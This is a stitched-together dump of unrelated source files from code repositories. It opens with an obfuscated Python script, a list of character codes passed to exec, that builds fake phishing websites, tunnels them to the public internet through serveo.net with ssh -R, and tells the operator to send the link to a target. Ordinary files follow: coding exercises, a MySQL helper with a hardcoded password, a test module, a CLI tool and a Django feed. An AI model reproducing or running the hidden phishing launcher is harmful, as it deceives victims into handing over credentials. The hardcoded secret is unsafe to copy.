116, 100, 111, 117, 116, 46, 102, 108, 117, 115, 104, 40, 41, 59, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 48, 46, 50, 48, 41, 10, 9, 9, 9, 9, 10, 99, 108, 97, 115, 115, 32, 103, 112, 115, 40, 41, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 99, 101, 107, 95, 114, 101, 113, 117, 105, 114, 101, 100, 40, 41, 10, 9, 9, 115, 101, 108, 102, 46, 103, 112, 115, 40, 41, 10, 9, 100, 101, 102, 32, 103, 112, 115, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 105, 102, 32, 111, 115, 46, 112, 97, 116, 104, 46, 101, 120, 105, 115, 116, 115, 40, 34, 114, 97, 
119, 47, 115, 101, 114, 118, 101, 114, 47, 103, 112, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 41, 58, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 70, 105, 108, 101, 32, 105, 110, 100, 101, 120, 46, 112, 104, 112, 32, 119, 97, 115, 32, 102, 111, 117, 110, 100, 32, 105, 110, 32, 37, 115, 47, 103, 112, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 37, 115, 34, 37, 40, 82, 44, 78, 44, 82, 44, 78, 41, 41, 10, 9, 9, 9, 114, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 63, 37, 115, 93, 32, 68, 105, 100, 32, 117, 32, 119, 97, 110, 116, 32, 116, 111, 32, 101, 100, 105, 116, 32, 115, 105, 116, 101, 63, 32, 121, 47, 110, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 105, 102, 32, 114, 46, 108, 111, 119, 101, 114, 40, 41, 32, 61, 61, 32, 34, 121, 34, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 99, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 72, 84, 77, 76, 32, 84, 105, 116, 108, 101, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 98, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 65, 108, 101, 114, 116, 32, 77, 115, 103, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 100, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 72, 84, 77, 76, 32, 66, 111, 100, 121, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 115, 101, 114, 118, 101, 114, 46, 103, 112, 115, 40, 99, 44, 98, 44, 100, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 
46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 103, 112, 115, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 51, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 
118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 
34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 103, 112, 115, 47, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 52, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 
102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 
107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 100, 101, 102, 32, 98, 101, 110, 103, 111, 110, 103, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 97, 61, 91, 34, 124, 34, 44, 34, 47, 34, 44, 34, 45, 34, 44, 34, 92, 92, 34, 93, 10, 9, 9, 9, 102, 111, 114, 32, 120, 32, 105, 110, 32, 97, 58, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 32, 34, 92, 114, 91, 123, 125, 43, 123, 125, 93, 32, 82, 117, 110, 110, 105, 110, 103, 32, 87, 101, 98, 115, 101, 114, 118, 101, 114, 58, 32, 104, 116, 116, 112, 58, 47, 47, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 32, 46, 46, 32, 123, 125, 32, 32, 34, 46, 102, 111, 114, 109, 97, 116, 40, 71, 44, 78, 44, 115, 101, 108, 102, 46, 97, 44, 10, 9, 9, 9, 9, 120, 10, 9, 9, 9, 9, 41, 44, 59, 115, 121, 115, 46, 115, 116, 100, 111, 117, 116, 46, 102, 108, 117, 115, 104, 40, 41, 59, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 48, 46, 50, 48, 41, 10];exec "".join([chr(i) for i in d])
| [
"karuma1363@gmail.com"
] | karuma1363@gmail.com |
6d935daa518bfb71dc1ec9c4b2da0127e0dcea10 | 2d5d13c4bdc64202a520f32e7d4a44bb75e2004f | /week-02/d04/substr.py | ebcf9c90389536fc31a978afb81cdf52ff7d22e8 | [] | no_license | green-fox-academy/andrasnyarai | 43b32d5cc4ad3792ef8d621328f9593fc9623e0b | 19759a146ba2f63f1c3e4e51160e6111ca0ee9c3 | refs/heads/master | 2021-09-07T16:19:34.636119 | 2018-02-26T00:38:00 | 2018-02-26T00:38:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # Create a function that takes two strings as a parameter
# Returns the starting index where the second one is starting in the first one
# Returns -1 if the second string is not in the first one
input = "this is what I'm searching in"
input_word = "searching"
def searching(sentence, word):
s_index = sentence.find(word, 1)
return s_index
print(searching(input, input_word))
| [
"andrasnyarai@gmail.com"
] | andrasnyarai@gmail.com |
3a3f36b74b6ea8143b5175ba354b4bb508c2f61e | a502940c27096a1becb968e82dd7fb456cf12f74 | /js/createTable.py | 3628f32e216ad3ecc4827a220722b44a08ff1c8c | [
"MIT"
] | permissive | BjornWouters/PubCheck | 2ecad0fda93644e3c5618cc89bade369faaea20d | 8be12f9664b786bdf07b1f8f1be0362ae7c72ea2 | refs/heads/master | 2016-09-03T07:01:24.966075 | 2014-06-17T15:04:42 | 2014-06-17T15:04:42 | 20,400,120 | 2 | 0 | null | 2014-06-04T09:51:29 | 2014-06-02T10:21:49 | JavaScript | UTF-8 | Python | false | false | 833 | py | import mysql.connector
def createTable():
conn = mysql.connector.connect (host = "127.0.0.1",
user = "bi2_pg5",
password = "blaat1234",
db= "bi2_pg5")
cursor = conn.cursor()
cursor.execute("SELECT name FROM compound "
"GROUP BY name")
compoundList = cursor.fetchall()
compounds = ""
for i in range(len(compoundList)):
hyperlink = str(compoundList[i][0]).replace(" ", "+")
compounds += "<tr><td width='100%' onclick=""window.location='createJSON.psp?compound="+hyperlink+"'"">"+str(compoundList[i][0])+"</td></tr>\n"
cursor.close()
conn.close()
return compounds
| [
"bjorn-wouters@hotmail.com"
] | bjorn-wouters@hotmail.com |
27e4ddb0ceff016becbe4500d30ff6f059b91134 | 9fb13659c6c73996581fb252ef33ef589392770b | /test_utilities/src/d1_test/mock_api/tests/test_create.py | ad6d8382c9c6dd166ce7ff5c8bbaf0ca676a6362 | [
"Apache-2.0"
] | permissive | xlia/d1_python | ea9585c462cb1e4f2d50ff1c9ce17a33e7649265 | c4745e70a00b14fc1d8c66c6995a2d150ef69956 | refs/heads/master | 2021-09-07T08:48:02.123106 | 2018-02-20T14:59:33 | 2018-02-20T14:59:33 | 113,352,728 | 0 | 0 | null | 2018-02-20T14:39:00 | 2017-12-06T18:28:20 | Python | UTF-8 | Python | false | false | 2,064 | py | # -*- coding: utf-8 -*-
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2016 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import base64
import json
import StringIO
import responses
import d1_test.d1_test_case
import d1_test.mock_api.create as mock_create
import d1_test.mock_api.util
class TestMockPost(d1_test.d1_test_case.D1TestCase):
@responses.activate
def test_1000(self, mn_client_v1_v2):
"""mock_api.create(): Echoes the request"""
mock_create.add_callback(d1_test.d1_test_case.MOCK_BASE_URL)
pid, sid, sciobj_str, sysmeta_pyxb = \
d1_test.instance_generator.sciobj.generate_reproducible(mn_client_v1_v2, 'post_pid')
response = mn_client_v1_v2.createResponse(
'post_pid', StringIO.StringIO(sciobj_str), sysmeta_pyxb
)
identifier_pyxb = mn_client_v1_v2.bindings.CreateFromDocument(
response.content
)
assert identifier_pyxb.value() == 'echo-post'
echo_body_str = base64.b64decode(response.headers['Echo-Body-Base64'])
echo_query_dict = json.loads(
base64.b64decode(response.headers['Echo-Query-Base64'])
)
echo_header_dict = json.loads(
base64.b64decode(response.headers['Echo-Header-Base64'])
)
assert isinstance(echo_body_str, basestring)
assert isinstance(echo_query_dict, dict)
assert isinstance(echo_header_dict, dict)
| [
"git@dahlsys.com"
] | git@dahlsys.com |
09952c659f7278479a5b102c81eb45616c26ce63 | bd4e425216fa73d7077ff6033ba4858c2a8e45fb | /idea/cli.py | 05dca43dac0421c0532b34e027d3542618a637e3 | [
"WTFPL"
] | permissive | piratus/idea | 6f552f932b403be8122560e299aad9fbc9556a57 | 6f97c1fc1ccd35e01dee57607638093f7d903c90 | refs/heads/master | 2020-03-22T16:45:36.650144 | 2018-07-21T21:55:11 | 2018-07-21T21:55:43 | 140,349,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,474 | py | import os
from collections import namedtuple
from pathlib import Path
from importlib import resources
import click
from jinja2 import Template
from lxml import etree
with resources.open_text('idea', 'module_tpl.xml') as fid:
MODULE_TPL = Template(fid.read())
Directory = click.Path(file_okay=False, exists=True, resolve_path=True)
@click.group()
def cli():
"""IntelliJ IDEA helper utility"""
pass
def get_project_root():
path = Path(os.getcwd())
while path.parent:
if (path / '.idea').exists():
return path
path = path.parent
raise click.BadParameter("Doesn't look like you're inside an IDEA project")
def read_xml(xml_path: Path) -> etree.ElementTree:
if not xml_path.exists():
raise click.BadParameter(f'File "{str(xml_path)}" does not exist')
return etree.fromstring(xml_path.read_bytes())
Module = namedtuple('Module', ['iml', 'root'])
@cli.command(name='list')
def list_modules():
"""List project's modules"""
project = get_project_root()
xml_path = project / '.idea' / 'modules.xml'
xml_node = read_xml(xml_path).find('component/modules')
root = str(project.absolute())
def get_module_root(module_path: Path) -> Path:
module_xml = read_xml(module_path)
module_root = module_xml.find('component/content').attrib['url']
return Path(module_root.replace('file://$MODULE_DIR$', root))
configs = [Path(m.attrib['filepath'].replace('$PROJECT_DIR$', root))
for m in xml_node.iterchildren()]
modules = [Module(config, get_module_root(config)) for config in configs]
for module in modules:
print(f'{str(module.iml)}: {str(module.root)}')
@cli.command(name='scan')
def scan_modules():
"""List project's modules"""
project_dir = get_project_root()
for path in project_dir.glob('**/pom.xml'):
if 'node_modules' not in path.parents:
print(path.parent.relative_to(project_dir))
@cli.command()
@click.argument('path', type=Directory)
@click.option('-n', '--name', help='Custom module name')
def add(path: str, name=None, project=os.getcwd()):
"""Add a module to the project"""
module_root = Path(path)
name = module_root.name if not name else name
project_dir = get_project_root()
idea_dir = project_dir / '.idea'
iml_path = idea_dir / f'{name}.iml'
if iml_path.exists():
raise click.BadParameter(f'Module "{str(iml_path)}" already exists')
xml_path = idea_dir / 'modules.xml'
if not xml_path.exists():
raise click.BadParameter(f'File "{str(xml_path)}" does not exist')
def rel(glob):
return [p.relative_to(project_dir) for p in module_root.glob(glob)]
module_iml = MODULE_TPL.render(
module_root=module_root.relative_to(project_dir),
source_folders=rel('src'),
test_folders=rel('test*'),
exclude_folders=rel('dist'),
exclude_patterns=[
'.cache',
'.vscode',
'node_modules'
]
)
click.echo(f'Writing {iml_path.relative_to(project_dir)}')
iml_path.write_text(module_iml)
xml = read_xml(xml_path)
xml.find('component/modules').append(etree.Element('module', {
'fileurl': f'file://$PROJECT_DIR$/.idea/{name}.iml',
'filepath': f'$PROJECT_DIR$/.idea/{name}.iml'
}))
click.echo(f'Updating {xml_path.relative_to(project_dir)}')
xml_path.write_bytes(etree.tostring(xml, method='xml'))
| [
"piratus@gmail.com"
] | piratus@gmail.com |
22eaa884ceac3f397797b21f255a21e0d76317d7 | 66b6664af0af3b127fd113ce6d56e55d7d6817ca | /py/LinkedListRandomNode.py | 03e5869c809c7f0e683f9b2be30a25882bc9030e | [] | no_license | sangreal/PyLintcode | f830b2ab3891af9681272f0af12ab6040f8e8533 | 805d99b51df424b5b87dbc6ef2c4c5f8012f4434 | refs/heads/master | 2020-12-14T06:36:46.775392 | 2017-06-11T23:39:21 | 2017-06-11T23:39:21 | 46,391,091 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | import random
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def __init__(self, head):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
:type head: ListNode
"""
self.head = head
def getRandom(self):
"""
Returns a random node's value.
:rtype: int
"""
k = 1
cnt = 0
retNode = 0
curnode = self.head
while curnode is not None:
if cnt < k:
retNode = curnode.val
else:
rrand = random.randint(0, cnt)
if rrand < k:
retNode = curnode.val
cnt += 1
curnode = curnode.next
return retNode
| [
"martynwin@gmail.com"
] | martynwin@gmail.com |
7ee5f326b39f30c07f31549b5ea6d8369bd733f6 | 86eb5c21782596a55ee68abd7af0a8ef25ceea70 | /integrations/local_settings.example.py | 78aea813195cc6d73b76b4d496959583fd7b0316 | [] | no_license | pkitutu/integrations | fda97bcf5bebaabd3c2a614597fd3d6f9ba054d1 | 00d8238ad365d7fb0026540c7392947331fc623f | refs/heads/master | 2022-05-02T14:21:53.718235 | 2019-10-17T18:46:30 | 2019-10-17T18:46:30 | 215,852,855 | 0 | 0 | null | 2022-04-22T22:36:25 | 2019-10-17T17:50:56 | Python | UTF-8 | Python | false | false | 207 | py | SECRET_KEY = 'xxxxxxxxxx'
MOMO_API_URL = 'https://sandbox.momodeveloper.mtn.com/collection/v1_0/'
MOMO_SUBSCRIPTION_KEY = 'your momo subscription key'
MOMO_TARGET_ENVIRONMENT = 'sandbox'
DB_FETCH_LIMIT = 10 | [
"pkitutu@gmail.com"
] | pkitutu@gmail.com |
45a1455cad84d3b82f52be1726c8da09b1788c0b | 1b8a99a4ff80da51dc81dd8354bf9bf1cbd25a8b | /2022/special_array_with_x_elements_greater_than_or_equal_x.py | 1eed93272f0a62c0218b8b94b721fe028f723576 | [] | no_license | eronekogin/leetcode | ea639eebe0cd70af9eb4cba59bc68f636d7b3e0c | edb870f83f0c4568cce0cacec04ee70cf6b545bf | refs/heads/master | 2023-08-16T10:35:57.164176 | 2023-08-14T11:25:33 | 2023-08-14T11:25:33 | 163,679,450 | 0 | 0 | null | 2021-09-09T12:04:44 | 2018-12-31T15:33:06 | Python | UTF-8 | Python | false | false | 624 | py | """
https://leetcode.com/problems/special-array-with-x-elements-greater-than-or-equal-x/
"""
class Solution:
def specialArray(self, nums: list[int]) -> int:
sortedNums = sorted(nums, reverse=True)
N = len(nums)
for i in range(N):
x = i + 1
if sortedNums[i] >= x: # Now we have x numbers >= x.
if i == len(nums) - 1 or sortedNums[i + 1] < x:
# Make sure exactly x numbers are >= x:
# 1. No more numbers left.
# 2. The next number is less than x.
return x
return -1
| [
"mengyu.jiang@gmail.com"
] | mengyu.jiang@gmail.com |
c7d93a083efcd77115f7f747b379ad57f89e5ff9 | 947ee6c080d4e6ce704ec6687be2eab5feaccc2b | /typeidea/blog/rss.py | 0dcba20d49d3034c2407b825cd878779616d1155 | [
"Apache-2.0"
] | permissive | zxknjcjdx/typeidea | 592ed554ff406c3914f792db5c1bf37c6a722bc8 | a213e823613df11176d6864d1c9d7a929754050c | refs/heads/master | 2020-06-10T08:46:34.755463 | 2019-07-06T10:35:09 | 2019-07-06T10:35:09 | 193,625,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,041 | py | from django.contrib.syndication.views import Feed
from django.urls import reverse
from django.utils.feedgenerator import Rss201rev2Feed
from .models import Post
class ExtendedRSSFeed(Rss201rev2Feed):
def add_item_elements(self, handler, item):
super(ExtendedRSSFeed, self).add_item_elements(handler, item)
handler.addQuickElement('content:html', item['content_html'])
class LatestPostFeed(Feed):
feed_type = Rss201rev2Feed
title = 'Typeidea Blog System'
link = '/rss/'
description = 'typeidea is a blog system power by django'
def items(self):
return Post.objects.filter(status=Post.STATUS_NORMAL)[:5]
def item_title(self, item):
return item.title
def item_description(self, item):
return item.desc
def item_link(self, item):
return reverse('post-detail', args=[item.pk])
def item_extra_kwargs(self, item):
return {'content_html': self.item_content_html(item)}
def item_content_html(self, item):
return item.content_html
| [
"1990858822@qq.com"
] | 1990858822@qq.com |
55d553eca6268f2d5ec4ae4a218148c431371d37 | 68ac39d3f59988f3a5e581041a76d8d6c2f00d5d | /happy/HappyNodeTcpReset.py | 0ff3935eb6ed51ce7a5d6958029ecaa0617f4a7c | [
"Apache-2.0"
] | permissive | emargolis/happy | 62f274ff21e8be66922e239acaf7bbb6f53cea27 | 40d6e216d1a671c14b72e7e59f23b98cbda5d954 | refs/heads/master | 2021-01-16T15:16:25.950683 | 2020-02-26T20:04:06 | 2020-02-26T20:07:05 | 243,164,644 | 0 | 0 | Apache-2.0 | 2020-02-26T04:02:20 | 2020-02-26T04:02:19 | null | UTF-8 | Python | false | false | 4,586 | py | #!/usr/bin/env python
#
# Copyright (c) 2016-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
# @file
# Implements HappyNodeTcpReset class through which nodes reset tcp connection on specific interface
#
#
import os
import sys
from happy.ReturnMsg import ReturnMsg
from happy.Utils import *
from happy.HappyNode import HappyNode
import happy.HappyProcessStart
options = {}
